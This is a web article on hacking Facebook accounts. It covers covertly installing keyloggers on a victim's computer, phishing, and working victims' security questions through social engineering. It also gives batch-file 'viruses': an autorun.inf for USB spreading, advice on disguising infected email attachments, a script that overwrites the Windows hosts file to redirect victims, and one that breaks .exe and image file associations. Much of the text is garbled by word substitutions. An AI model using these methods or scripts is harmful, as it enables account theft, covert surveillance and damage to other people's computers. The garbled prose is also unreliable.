    A Keylogger is a type of software that usually runs in the background, without the noesis of an innocent victim and secretly records their actions. A wide variety of functionality is offered by various products : Nearly all record every keystroke on the keyboard in a simple text file format, some record mouse clicks and pointer locations, some record folders and files opened and some even have screenshots at regular intervals.
    Most of the keyloggers provide an pick whether to store the text file locally transport it to a FTP server or your e-mail id. They can be installed and gear up relatively easily similar any other program. One time setup, they usually become into hiding as a groundwork process leaving no trace on the surface and starting upwards automatically when the operating organization starts.

For some reason people seem to avoid or wait over keyloggers, I tin can requite you my discussion this is the all-time and easiest method for hacking whatever type of account there is, so definitely bank check this out. In our case, we want the victim to login to their Facebook account on a compromised system, ane that has a stealthy keylogger installed. There are ii ways to go about this :Installing a keylogger on your system and having them use it to login to their FB account, or if you have temporary admission to their system Installing information technology on their computer and having the log files sent to yous by electronic mail or FTP.
Whichever way y'all adopt, the method is the same. Download a cardinal logger, follow the smooth setup instructions every bit you would when installing anything, customize settings according to your preference or download the Keylogger and copy it on a pendrive and and so install it on Victim'south PC.
I take personally tried and tested the following keyloggers, you lot can choose any of these randomly since they all seem to do the job :

(i)Actual key-logger – Download from http://www.actualkeylogger.com/download-complimentary-fundamental-logger.html
(2)Habitation key-logger – Download from http://www.kmint21.com/download.html
(iii) REFOG Free key-logger – Download from https://www.refog.com/download.html

(Sure full versions of very skillful keyloggers are available every bit torrents from websites like isohunt.com , kickass.to )

  • Phishing : This method has been described in great detail in the Phishing department. Follow the instructions carefully while using facebook.com instead of gmail.com.
  • Social Engineering :
    Facebook uses security questions as a recovery method, virtually anybody sets it upwards to a personal question similar :
    "Where were you born? "
    "What was your first pets name? "

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.
A social engineer runs what used to be called a "con game." For example, a person using social engineering to break into a estimator network might endeavor to gain the confidence of an authorized user and become them to reveal information that compromises the network's security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, phone call the authorized employee with some kind of urgent problem that requires immediate network admission.
Appeal to vanity, appeal to dominance, entreatment to greed, and old-fashioned eavesdropping are other typical social engineering techniques.

For this method to work, you need to know the person whose business relationship you want to hack. In fact, you need to know them well plenty, such that it doesn't seem suspicious when you carefully endeavour to work up their recovery questions into your conversation and go them to answer it casually.
Afterward that,using the "Forgot your password? Click Here!" Button one can simply turn over an business relationship'south user. Merely fifty-fifty after this, your work is not done all the same. Nowadays Facebook has implemented a 24 hour filibuster before recovering the account and logging in, And then if the victim happens to log in during that period they tin reverse the process in seconds. Non but do you need conscientious planning, but also careful timing.
Facebook uses a verification method during recovery if the victim's email and telephone number are no longer functional information technology asks to put in some other telephone number. If you lot can somehow get a concord of their cell phones or email accounts their business relationship is yours, otherwise the procedure may exist slow and fruitless.

Spreading batch viruses:We can spread the viruses or send information technology to some person by several ways, Given Bellow:

Through Pendrive or External Hard Drive:

  • Open notepad and write:

[autorun]

open=anything.bat

Icon=anything.ico

  • Salvage file as 'autorun.inf'
  • Put this 'autorun.inf' and your actual batch virus 'anything.bat' in pendrive .

When the victim would plug-in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Through email:

  • Open your email get one mail ready for the victim.
  • In attachments, attach the virus.
  • You can name it something (eg. Documents, Pics etc. )so that the victim wont recognize if it is a virus, and he'll open the file.
  • Transport the post.

By Uploading:

You tin can send the virus to whatever one by uploading it to any website , cloud storage , downloading app/software , Torrent etc.

Introduction: This virus in which we modify the IP and the browser e'er takes us to the IP and DNS is damaged.

Alert:This not much harmful just a small virus and tin can exist easily removed. Still if something goes wrong it can harm your PC. And so outset by:

  • There is a file called 'hosts' located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our spider web browser to take us to host located at that IP when that website name would be entered. I mean the asking to resolve IP of website is not sent to Domain Name Server(DNS) if the proper name of website in hosts  file.
  • Open Text, Note, Word etc. and write/copy:

@echo off

echo xxx.xxx.thirty.xxx http://www.anything.com > C:\windows\system32\drivers\etc\hosts                    (this command prints or add xxx.thirty.xxx.xxx. http://www.annihilation.com in hosts file)

  • Replace thirty.thirty.xxx.xxx  and http://www.anything.com with IP address and website of your option. Yous can take/redirect victim to whatever host located at specific IP when he would try to log on to specific website or u can simply block any website by entering its name and whatsoever invalid IP address.
  • Save with .bat extension (annihilation.bat)

We are done!!

Introduction: This is a virus in which all the extension like (.exe, .bat) are changed and non of the file or awarding opens correctly.

Warning: This isn't a very harmful or dangerous virus and can be recovered but if something goes wrong in making information technology, that will be on you.n So the steps are:

  • Open Text, Note, Give-and-take document etc. and blazon/copy:

@echo off

assoc .txt=anything (this control associates extension .txt with filetype anything)

assoc .exe=anything

assoc .jpeg=annihilation

assoc .png=annihilation

assoc .mpeg=anything

 (You can besides add your own extensions same like this in the file)

  • Now save the file with .bat extension.

Note: Every extension is associated with a file blazon similar extension 'exe' is  is associated with file blazon 'exefile'. To encounter them, merely enter command 'assoc' in command prompt.

Above lawmaking changes the clan of some extensions to file type 'anything' (means u tin write anything) which apparently doesn't exist. So all exe (paint,games,control prompt and many more than),jpeg,png,mpeg files wouldn't open properly.